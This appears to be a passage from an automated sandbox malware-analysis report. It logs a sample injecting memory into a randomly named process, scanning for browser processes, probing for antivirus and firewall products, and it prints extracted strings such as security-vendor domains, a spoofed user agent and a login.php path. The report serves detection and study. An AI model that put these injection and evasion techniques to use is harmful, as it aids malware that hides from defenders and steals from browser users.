    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2795000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2930000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2931000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2932000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2985000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 1570000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 1571000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 1572000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 15C5000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 26B0000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 26B1000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 26B2000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2705000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2FA0000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2FA1000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2FA2000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2FF5000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 27B0000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 27B1000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 27B2000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2805000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 23C0000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 23C1000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 23C2000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2415000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 520000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 521000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 522000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 575000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 24E0000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 24E1000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 24E2000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2535000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 3060000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 3061000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 3062000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 30B5000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 29E0000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 29E1000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 29E2000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2A35000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2D00000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2D01000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2D02000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2D55000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2D80000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2D81000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2D82000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2DD5000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2DF0000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2DF1000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2DF2000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2E45000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2EB0000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2EB1000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2EB2000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2F05000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 3070000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 3071000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 3072000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 30C5000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2C60000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2C61000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2C62000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2CB5000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2D70000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2D71000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2D72000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2DC5000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2250000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2251000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2252000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 22A5000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2FB0000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2FB1000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2FB2000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 3005000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2EA0000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2EA1000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2EA2000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2EF5000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 8D0000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 8D1000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 8D2000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 925000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeCode function: CreateToolhelp32Snapshot,Process32First,EnterCriticalSection,GetCurrentProcessId,StrStrIA,EnterCriticalSection,GetProcessHeap,HeapAlloc,LeaveCriticalSection,Process32Next,GetHandleInformation,CloseHandle, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex1_2_02CA78A0
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: CreateToolhelp32Snapshot,Process32First,EnterCriticalSection,GetCurrentProcessId,StrStrIA,EnterCriticalSection,GetProcessHeap,HeapAlloc,LeaveCriticalSection,Process32Next,GetHandleInformation,CloseHandle, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex5_2_02F778A0
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: CreateToolhelp32Snapshot,Process32First,EnterCriticalSection,GetCurrentProcessId,StrStrIA,EnterCriticalSection,GetProcessHeap,HeapAlloc,LeaveCriticalSection,Process32Next,GetHandleInformation,CloseHandle, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex6_2_025678A0
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: CreateToolhelp32Snapshot,Process32First,EnterCriticalSection,GetCurrentProcessId,StrStrIA,EnterCriticalSection,GetProcessHeap,HeapAlloc,LeaveCriticalSection,Process32Next,GetHandleInformation,CloseHandle, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex8_2_025D78A0
    Source: C:\Users\user\Desktop\5AFlyarMds.exeFile opened: CA HIPS KmxAgentJump to behavior
    Source: C:\Users\user\Desktop\5AFlyarMds.exeFile opened: Agnitum Outpost firewal \pipe\acsipc_serverJump to behavior
    Source: C:\Users\user\Desktop\5AFlyarMds.exeFile opened: Webroot PREVX C:\ProgramData\PrevxCSI\csidb.csiJump to behavior
    Source: C:\Users\user\Desktop\5AFlyarMds.exeFile opened: AVG C:\Program Files (x86)\AVG\AVG9\dfncfg.datJump to behavior
    Source: C:\Users\user\Desktop\5AFlyarMds.exeWindow found: AVP NULL ____AVP.RootJump to behavior
    Source: C:\Windows\apppatch\svchost.exeFile opened: CA HIPS KmxAgentJump to behavior
    Source: C:\Windows\apppatch\svchost.exeFile opened: Agnitum Outpost firewal \pipe\acsipc_serverJump to behavior
    Source: C:\Windows\apppatch\svchost.exeFile opened: Webroot PREVX C:\ProgramData\PrevxCSI\csidb.csiJump to behavior
    Source: C:\Windows\apppatch\svchost.exeFile opened: AVG C:\Program Files (x86)\AVG\AVG9\dfncfg.datJump to behavior
    Source: C:\Windows\apppatch\svchost.exeWindow found: AVP NULL ____AVP.RootJump to behavior
    Source: 5AFlyarMds.exe, 5AFlyarMds.exe, 00000000.00000002.1740350354.0000000000400000.00000040.00000001.01000000.00000005.sdmp, 5AFlyarMds.exe, 00000000.00000003.1736218436.00000000006FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000002.2975747606.00000000029B0000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd
    Source: cUKxeliGgCix.exe, 00000005.00000000.2078408909.0000000001B11000.00000002.00000001.00040000.00000000.sdmp, cUKxeliGgCix.exe, 00000006.00000000.2079123459.0000000000D71000.00000002.00000001.00040000.00000000.sdmp, cUKxeliGgCix.exe, 00000008.00000000.2080860743.0000000001111000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
    Source: 5AFlyarMds.exe, 00000000.00000002.1740350354.0000000000400000.00000040.00000001.01000000.00000005.sdmp, 5AFlyarMds.exe, 00000000.00000003.1736218436.00000000006FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2975747606.00000000029B0000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: avast.comkasperskydrwebeset.comantiviraviravirustotalvirusinfoz-oleg.comtrendsecureanti-malware.comodo.comavast.comkasperskydrwebeset.comantiviraviravirustotalvirusinfoz-oleg.comtrendsecureanti-malware.comodo.comgoogle.comgoogle.comDnsapi.dllDnsQuery_ADnsQuery_UTF8DnsQuery_WQuery_Mainws2_32.dllgetaddrinfogethostbynameinet_addrqwrtpsdfghjklzxcvbnmeyuioa1676d5775e05c50b46baa5579d4fc7;%s%sMozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)/login.php6908741AF4E26C68E1EE46F1041F009EECA931D2D53E11AD04CF03DEB7677754725005219D4B978D957ABA1678D353DE5AA0586B49E21F7EFFE2F73D7D2D8E26395286E1EA7A106CD617966D9FC5906C6E952289B4D671BA6ADE1B80ECF2468552F401D4D8134CAF4B56DC5F18B673710974A6F7A9AE9273979C092F52E8D7C9100016d3ad29879a90b4dd1b4f76e82166ca3T2data.txt\*.*...\ntdll.dllZwQuerySystemInformationGlobal\{EAF799BF-8249-4fe1-9A0D-92CD3CC22014}Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}fuckGlobal\HighMemoryEvent_%08xexplorer.exeShell_TrayWnd
    Source: cUKxeliGgCix.exe, 00000005.00000000.2078408909.0000000001B11000.00000002.00000001.00040000.00000000.sdmp, cUKxeliGgCix.exe, 00000006.00000000.2079123459.0000000000D71000.00000002.00000001.00040000.00000000.sdmp, cUKxeliGgCix.exe, 00000008.00000000.2080860743.0000000001111000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
    Source: cUKxeliGgCix.exe, 00000005.00000000.2078408909.0000000001B11000.00000002.00000001.00040000.00000000.sdmp, cUKxeliGgCix.exe, 00000006.00000000.2079123459.0000000000D71000.00000002.00000001.00040000.00000000.sdmp, cUKxeliGgCix.exe, 00000008.00000000.2080860743.0000000001111000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: }Program Manager
    Source: C:\Users\user\Desktop\5AFlyarMds.exeCode function: 0_2_00414050 cpuid 0_2_00414050
    Source: C:\Windows\apppatch\svchost.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDateJump to behavior
    Source: C:\Users\user\Desktop\5AFlyarMds.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\5AFlyarMds.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Windows\apppatch\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Windows\apppatch\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Windows\apppatch\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Windows\apppatch\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Windows\apppatch\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Windows\apppatch\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeQueries volume information: C:\ VolumeInformation
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeQueries volume information: C:\ VolumeInformation
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeQueries volume information: C:\ VolumeInformation
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeQueries volume information: C:\ VolumeInformation
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeQueries volume information: C:\ VolumeInformation
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeQueries volume information: C:\ VolumeInformation
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeQueries volume information: C:\ VolumeInformation
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeQueries volume information: C:\ VolumeInformation
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeQueries volume information: C:\ VolumeInformation
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeQueries volume information: C:\ VolumeInformation
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeQueries volume information: C:\ VolumeInformation
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeQueries volume information: C:\ VolumeInformation
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeQueries volume information: C:\ VolumeInformation
